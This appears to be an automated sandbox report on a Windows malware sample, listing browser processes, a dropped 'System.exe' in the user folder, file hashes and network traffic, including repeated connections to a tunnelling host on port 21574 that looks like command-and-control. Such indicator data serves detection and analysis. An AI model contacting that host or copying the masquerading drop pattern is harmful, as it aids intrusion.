"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff862bf46f8,0x7ff862bf4708,0x7ff862bf4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2816 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2832 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2392 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4740 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff862bf46f8,0x7ff862bf4708,0x7ff862bf4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2128 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2980 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2096 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2932 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2120 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4916 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | multi-why.gl.at.ply.gg | udp |
| US | 147.185.221.19:21574 | multi-why.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.19:21574 | multi-why.gl.at.ply.gg | tcp |
| US | 147.185.221.19:21574 | multi-why.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 147.185.221.19:21574 | multi-why.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 104.242.123.52.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 94.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 52.168.117.173:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 173.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 13.89.179.12:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 12.179.89.13.in-addr.arpa | udp |
Files
memory/4404-0-0x00000000006B0000-0x00000000006FA000-memory.dmp
memory/4404-1-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4404-2-0x000000001B420000-0x000000001B430000-memory.dmp
memory/1368-3-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/1368-4-0x0000025076CC0000-0x0000025076CE2000-memory.dmp
memory/1368-14-0x000002505DBE0000-0x000002505DBF0000-memory.dmp
memory/1368-15-0x000002505DBE0000-0x000002505DBF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izyw3gcm.1by.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1368-18-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/4856-30-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4856-31-0x00000222B7CB0000-0x00000222B7CC0000-memory.dmp
memory/4856-32-0x00000222B7CB0000-0x00000222B7CC0000-memory.dmp
memory/4856-34-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 34f595487e6bfd1d11c7de88ee50356a |
| SHA1 | 4caad088c15766cc0fa1f42009260e9a02f953bb |
| SHA256 | 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d |
| SHA512 | 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b |
memory/2852-45-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/2852-46-0x0000025FAEB70000-0x0000025FAEB80000-memory.dmp
memory/2852-48-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3737c3eb5510d74c3d6ea770e9ff4ffb |
| SHA1 | 88148610a4f00560b06bc8607794d85f15bf3b64 |
| SHA256 | b716e0860cc27dd1035a125f44833c5999f4a0429635df6d97634f041b25effa |
| SHA512 | db4db804933ab50bf56130a939040e33a57e4ec056c9e0c598bcae86bbaf093e2a22fd4ec8801f6b029985170f17859a931e63f28a7abb4f91780da2a33e1ebc |
memory/4408-61-0x0000021CDAF90000-0x0000021CDAFA0000-memory.dmp
memory/4408-60-0x0000021CDAF90000-0x0000021CDAFA0000-memory.dmp
memory/4408-59-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4408-63-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4404-68-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4404-69-0x000000001B420000-0x000000001B430000-memory.dmp
memory/4404-70-0x0000000002B50000-0x0000000002B5C000-memory.dmp
C:\Users\Admin\System.exe
| MD5 | f278e2fb4010c8403c00cf988354a0fd |
| SHA1 | 3c1c63f2f6678cc55deda531413674c9f4b090cf |
| SHA256 | 1fd1e3eceac872dffbc901adfba60312f30068884c2ef3ae8f15d6ce6f7aa474 |
| SHA512 | 85257af5832cb33de94d80544720ae91f2060b63513ddfac9698637531a5c1049dd37c22416fd0d624e6430be2f0c03d436ef4009cb2cab91c087169723da0b9 |
memory/2520-73-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/2520-75-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/5012-79-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/5012-80-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4788-82-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4788-83-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/2692-85-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/2692-86-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4404-87-0x000000001B480000-0x000000001B496000-memory.dmp
memory/3828-88-0x0000000000400000-0x0000000000410000-memory.dmp
memory/3828-89-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/3828-91-0x00000000053A0000-0x0000000005432000-memory.dmp
memory/3828-90-0x0000000005300000-0x000000000539C000-memory.dmp
memory/3828-92-0x00000000059F0000-0x0000000005F94000-memory.dmp
memory/3828-93-0x00000000056D0000-0x0000000005736000-memory.dmp
memory/960-95-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/960-96-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/960-94-0x0000000004880000-0x00000000048B6000-memory.dmp
memory/960-97-0x0000000005070000-0x0000000005698000-memory.dmp
memory/960-98-0x0000000004EA0000-0x0000000004EC2000-memory.dmp
memory/960-99-0x0000000005710000-0x0000000005776000-memory.dmp
memory/960-109-0x0000000005860000-0x0000000005BB4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10890cda4b6eab618e926c4118ab0647 |
| SHA1 | 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d |
| SHA256 | 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14 |
| SHA512 | a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221 |
memory/960-111-0x0000000005E40000-0x0000000005E5E000-memory.dmp
memory/960-112-0x0000000005E70000-0x0000000005EBC000-memory.dmp
memory/960-115-0x0000000074FF0000-0x00000000757A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\CrashpadMetrics-active.pma
| MD5 | f9abba11224c1ad45bcdaa95e882842b |
| SHA1 | 1c8bfbcb53d611f72ccc9b80c04eb4a1e45a2400 |
| SHA256 | bb7428477de5d502b5414b3123ae7bcd5aeb61d37da8492318a9a6b45242884b |
| SHA512 | 90a9a486a505a44e012d49104f3d87954f3c729a800939cc9b127f283eafd841db8c019ba30b96ab2ebed0ce4226af2147417b41242de2dc2d600af119345926 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\throttle_store.dat
| MD5 | 9e4e94633b73f4a7680240a0ffd6cd2c |
| SHA1 | e68e02453ce22736169a56fdb59043d33668368f |
| SHA256 | 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304 |
| SHA512 | 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | e0811105475d528ab174dfdb69f935f3 |
| SHA1 | dd9689f0f70a07b4e6fb29607e42d2d5faf1f516 |
| SHA256 | c91388c87878a9e2c530c6096dbdd993b0a26fefe8ad797e0133547225032d6c |
